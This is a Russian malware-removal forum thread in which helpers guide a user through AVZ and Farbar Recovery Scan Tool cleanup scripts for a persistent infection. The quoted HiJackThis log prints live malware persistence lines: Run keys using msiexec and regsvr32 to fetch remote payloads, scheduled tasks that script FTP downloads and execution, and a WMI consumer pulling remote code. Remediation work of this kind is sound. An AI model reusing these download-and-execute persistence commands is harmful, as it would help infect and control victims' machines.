Антивирус постоянно блокирует одни и те же объекты, сканирование ПК не помогает. Даже когда подозрительные объекты находятся в хранилище, проблема не решается.
Антивирус постоянно блокирует одни и те же объекты, сканирование ПК не помогает. Даже когда подозрительные объекты находятся в хранилище, проблема не решается.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) DrStanislav, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
HiJackThis (из каталога autologger)профиксить
Код:R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyOverride] = 127.0.0.1 O2 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O2-32 - HKLM\..\BHO: (no name) - {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} - (no file) O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.ftp0118.info:280/helloworld.msi /q O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0118.info:280/v.sct scrobj.dll O4 - MSConfig\startupreg: MyDesktop [command] = C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe /killme_30 /restoreme_5 /url_http://mpnl.ru/offers/uaby.csv /url2_http://hello.limbbo.ru/offers/uaby.csv (file missing) (HKCU) (2016/08/10) O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать ВСЕ при помощи Download Master - (no file) O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Закачать при помощи Download Master - (no file) O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt: Передать на удаленную закачку DM - (no file) O9-32 - Button: HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no name) - (no file) O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file) O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
После выполнения скрипта компьютер перезагрузится.Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Windows\help\lsmosee.exe',''); QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\debug\item.dat',''); QuarantineFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe',''); QuarantineFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe',''); QuarantineFile('c:\users\stanis~1\appdata\local\temp\rarsfx15\magicwifi.exe',''); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start1'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start'); RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\MyDesktop','command'); DeleteFile('C:\Users\StanislaV\AppData\Roaming\MyDesktop\linkme0120.exe','32'); DeleteFile('C:\Windows\system32\Tasks\Java Update Schedule','64'); DeleteFile('C:\Users\StanislaV\AppData\Roaming\TeamViewer\Java\jusched.exe','32'); DeleteFile('c:\windows\debug\item.dat','32'); DeleteFile('c:\windows\help\lsmosee.exe','32'); DeleteFile('c:\windows\debug\ok.dat','32'); DeleteFile('C:\Windows\system32\Tasks\ok','64'); DeleteFile('C:\Windows\help\lsmosee.exe','32'); ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true); BC_ImportAll; ExecuteSysClean; BC_Activate; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
После перезагрузки:
- Выполните в AVZ:
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
- Подготовьте лог AdwCleaner и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Лог AdwCleaner
Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Отчет после очистки
- Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Отчет
Сами настраивали следующую политику или вам это неизвестно?
Код:HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP)
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:CreateRestorePoint: CloseProcesses: CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found> CHR HKLM-x32\...\Chrome\Extension: [pkijdmeepjhpenmighhaodgfoogncnlk] - <no Path/update_url> File: C:\Windows\system32\a.exe File: C:\Windows\system32\TmpA765.tmp File: C:\Windows\system32\TmpA65C.tmp File: C:\Windows\qeriuwjhrf Zip: C:\Windows\system32\a.exe;C:\Windows\system32\TmpA765.tmp;C:\Windows\system32\TmpA65C.tmp;C:\Windows\qeriuwjhrf 2018-06-13 20:25 - 2018-06-13 20:38 - 000000000 ____D C:\Program Files (x86)\IObit 2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\Users\Все пользователи\IObit 2018-06-26 07:26 - 2015-10-31 23:08 - 000000000 ____D C:\ProgramData\IObit Folder: C:\Windows\Help File: C:\Users\StanislaV\AppData\Local\BIT55ED.tmp File: C:\Windows\SysWOW64\dlumd10.dll File: C:\Windows\SysWOW64\dlumd11.dll File: C:\Windows\SysWOW64\dlumd9.dll File: C:\Windows\System32\dlumd10.dll File: C:\Windows\System32\dlumd11.dll File: C:\Windows\System32\dlumd9.dll ContextMenuHandlers1: [Atheros] -> {B8952421-0E55-400B-94A6-FA858FC0A39F} => -> No File ContextMenuHandlers1: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File ContextMenuHandlers2: [RS File Recovery] -> {5DDE4698-CD62-42A2-9D87-D29AED370E3B} => -> No File ContextMenuHandlers4: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File ContextMenuHandlers6: [IObitUnstaler] -> {B19ED566-D419-470b-B111-3C89040BC027} => -> No File Task: {AF76A4C7-8044-4EFB-BABF-6A4C2663342C} - System32\Tasks\Driver Booster SkipUAC (StanislaV) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe Task: {4CC0C756-5618-4CF1-8EEA-B1E6AD6F0871} - \Java Update Schedule -> No File <==== ATTENTION Task: {CB91F580-B97A-41F4-8BC0-C9C4470D5630} - System32\Tasks\Uninstaller_SkipUac_StanislaV => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] AlternateDataStreams: C:\ProgramData\TEMP:6DEA77C2 [140] AlternateDataStreams: C:\Users\Все пользователи\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] AlternateDataStreams: C:\Users\Все пользователи\TEMP:6DEA77C2 [140] HKU\S-1-5-21-1056889933-623668751-4224552474-1000\Software\Classes\exefile: <==== ATTENTION Reboot:- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
Файл <date>.zip (где <date> текущая дата и время) c рабочего стола загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Сам ничего не настраивал.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:CreateRestorePoint: CloseProcesses: HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e4f67768-08f0-453e-ac49-8e727168e23a} <==== ATTENTION (Restriction - IP) C:\Windows\system32\a.exe C:\Windows\qeriuwjhrf C:\Windows\Help\lsmosee.exe Reboot:- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Лог, сделан до появления угроз.
- - - - -Добавлено - - - - -
Еще угрозы,до этого их не было, блокировка подключения к сайтам. Началось после выполнения последнего скрипта в Farbar Recovery Scan Tool
- - - - -Добавлено - - - - -
Вот еще, после всех перечисленных действий которые Вы рекомендовали сделать,угроза пропала,теперь вновь обнаружена.
Последний раз редактировалось DrStanislav; 03.07.2018 в 07:26.
приложите новый лог FRST, уточните пожалуйста указанная проблема проявляется во всех браузерах?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Пользуюсь только браузером Яндекс. Установлены также Хром и Мазила,но ими не пользуюсь.
Но проблема в них присутствует? Необходимо понять, проблема в том, что присутствуют вредоносные расширения в яндекс-браузере?Сообщение от DrStanislav
Когда речь идет о новых логов FSRT, то необходимо выполнить заново инструкции:
- Скачайте Farbar Recovery Scan Tool
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
В них проблем не замечал.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:CreateRestorePoint: CloseProcesses: File: C:\Windows\System32\drivers\xspltspk.sys File: C:\Windows\SysWOW64\Drivers\vde2otc3.sys File: C:\Program Files\Common Files\xp.dat File: C:\Program Files\Common Files\xpdown.dat File: C:\Windows\system32\ps File: C:\Windows\system32\p File: C:\Windows\system32\s Folder: C:\Users\StanislaV\AppData\Local\RadeonSettings File: C:\Windows\system32\Drivers\cnnctfy3.sys File: C:\Windows\system32\Drivers\cfywlan1.sys 2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\Roaming\IObit 2018-06-26 07:26 - 2015-10-31 15:57 - 000000000 ____D C:\Users\StanislaV\AppData\LocalLow\IObit 2018-03-31 18:49 - 2018-03-31 18:49 - 000000000 _____ () C:\Users\StanislaV\AppData\Local\{86AAFA7F-23F2-4E8C-8BC8-E6E0A5F218EB} File: C:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe File: C:\Users\StanislaV\Desktop\WGCheck.exe CMD: netsh winsock reset Reboot:- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:CreateRestorePoint: CloseProcesses: Zip: C:\Program Files\Common Files\xp.dat;C:\Program Files\Common Files\xpdown.dat;C:\Windows\system32\ps;C:\Windows\system32\p;C:\Windows\system32\s C:\Program Files\Common Files\xp.dat C:\Program Files\Common Files\xpdown.dat C:\Windows\system32\ps C:\Windows\system32\p C:\Windows\system32\s Reboot:- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
Файл <date>.zip с рабочего стола загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Лог
Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Уважаемый(ая) DrStanislav, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
